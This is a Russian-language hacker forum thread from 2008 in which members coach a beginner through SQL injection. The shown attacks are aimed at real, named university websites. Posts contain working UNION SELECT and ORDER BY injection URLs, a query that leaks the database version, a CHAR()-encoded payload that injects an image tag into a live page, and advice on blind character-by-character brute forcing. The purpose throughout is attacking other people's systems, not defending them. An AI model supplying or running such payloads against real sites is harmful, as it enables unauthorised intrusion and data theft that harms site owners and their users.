Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Ребят, прошу помощи.Через order by подобрал поля. Пытаюсь вывести через
    index.php?ID=-19+UNION+SELECT+1,2,3/* -т.е. при неверном id, редиректит на др. страницу another.html
    При запросе ID=19+UNION+SELECT+1,2,3/* не выводит ошибок, но и выводимых полей нет, id то верный.
    Как можно обойти?
    И вообще не первый раз встречаюсь с ситуацией,id=1593+order+by+12/* ошибка,id=1593+order+by+8/* нет ошибки,id=-1593+order+by+8/* редирект.Why?
     
    #2241 Imperou$, 10 Jun 2008
    Last edited: 10 Jun 2008
    1 person likes this.
  2. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    пробуй
    ID=-1+UNION+SELECT+1,2,3/*
    или
    ID=19+and+1=0+UNION+SELECT+1,2,3/*
     
    2 people like this.
  3. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    2 AFoST
    К сожалению не прокатило. Но все равно спасибо за совет.
     
  4. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Imperou$
    давай ссылку, и будет гораздо проще
     
  5. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    jokester, именно :)
    Imperou$, давай ссылку-будем вдуплять :)
     
  6. 1SeTh

    1SeTh Elder - Старейшина

    Joined:
    17 Feb 2006
    Messages:
    164
    Likes Received:
    18
    Reputations:
    5
    спасибо, пробовал весь английский алфавит в запросе, не нашел юзера у аого чтобы был сериал намбер
     
    1 person likes this.
  7. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    1SeTh, я тоже ищу-пока безрезультатно. видать программулину мало кто покупает :)
     
    2 people like this.
  8. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    http://cropandsoil.oregonstate.edu/people/faculty.php?ID=19+order+by+3/*
    вот ссыль, это одна из целой кучи, где я с такой хней встречался.
     
  9. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,190
    Reputations:
    430
    http://img225.imageshack.us/img225/9384/raosujayalj2.jpg
    Всё из-за этого.
     
    #2249 Ch3ck, 11 Jun 2008
    Last edited: 11 Jun 2008
    2 people like this.
  10. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Я не сомневался :)
    а если серьёзно? Я просто не понял стёба.
     
  11. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Imperou$
    Обычная слепая скуль(я во всяком случае вывода не добился), подзапросы, или другой параметр, я не смотрел
     
    2 people like this.
  12. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    http://kmoddl.library.cornell.edu/resources.php?id=1593+order+by+1/*
    А вот такой вариант? Ребят, вы если что нащли или показали, то обьясняйте пожалуйста. А то я не всегда догоняю о чем речь :) Или хотя бы ткните на статьи где это подробно рассматривается. Например с подзапросами у меня вообще лажа полная, не понимаю как они функционируют. Новичёк ещё просто, не разобрался со всем.
     
    #2252 Imperou$, 11 Jun 2008
    Last edited: 11 Jun 2008
    1 person likes this.
  13. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Твой параметр тоже слепая , но вот другой с выводом:
    _http://kmoddl.library.cornell.edu/resources.php?t=9999999+union+select+1,UNHEX(HEX(version())),3/*
    Сдесь про подзапросы:
    http://forum.antichat.ru/showthread.php?t=18552
     
    #2253 Kakoytoxaker, 11 Jun 2008
    Last edited: 11 Jun 2008
    1 person likes this.
  14. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Огромное спасибо! Начал вьезжать, что к чему.
     
  15. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,190
    Reputations:
    430
    http://kmoddl.library.cornell.edu/resources.php?t=9999999+union+select+1,CHAR(60,105,109,103,32,115,114,99,61,104,116,116,112,58,47,47,105,109,103,53,49,55,46,105,109,97,103,101,115,104,97,99,107,46,117,115,47,105,109,103,53,49,55,47,53,57,50,50,47,114,97,111,115,117,106,97,121,97,106,115,54,46,106,112,103,62,60,47,105,109,103,62),3/*
     
    3 people like this.
  16. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    Ты про что именно ? ;)
     
  17. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    И снова здраствуйте :)

    Почему возникает ошибка при попытке вывода колонок методом union+select вида:

    The used SELECT statements have a different number of columns

    если через order+by поля подобрал верно?
     
  18. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Возможно эти значения используются в нескольких запросах. В одном из запросов колонок больше/меньше чем ты указал, а второй запрос выполнился правильно, но вывода результатов на страницу нет.
     
    2 people like this.
  19. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Как всегда тебе спасибо за чёткость и оперативность :) Курю мануалы, накачал статей, но не нашёл по сабжу :(
    Обойти возможно?
     
  20. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    посимвольный брут
     
    1 person likes this.
Thread Status:
Not open for further replies.